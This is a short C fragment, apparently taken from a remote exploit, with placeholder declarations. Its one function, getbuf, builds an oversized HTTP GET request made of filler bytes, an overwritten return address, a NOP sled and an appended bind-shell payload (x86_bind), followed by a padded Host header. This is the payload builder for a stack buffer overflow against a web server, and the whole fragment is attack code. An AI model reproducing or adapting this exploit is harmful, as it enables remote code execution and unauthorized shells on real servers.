
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int BUFSIZE ;
 scalar_t__ malloc (int) ;
 int memset (char*,char,int) ;
 int printe (char*,int) ;
 int strcat (char*,char*) ;
 int strcpy (char*,char*) ;
 int strlen (char*) ;
 char* x86_bind ;

char *getbuf(unsigned int addr){
 char *buf;
 if(!(buf=(char *)malloc(BUFSIZE+1)))
  printe("getbuf(): allocating memory failed.",1);
 memset(buf,0,BUFSIZE);
 strcpy(buf,"GET /");
 memset(buf+5,'x',1064);
 *(long *)&buf[1064+5]=addr;
 memset(buf+strlen(buf),'\x90',32);
 strcat(buf,x86_bind);
 strcat(buf,"\nHost: ");
 memset(buf+strlen(buf),'x',999);
 strcat(buf,"\n\n");
 return(buf);
}
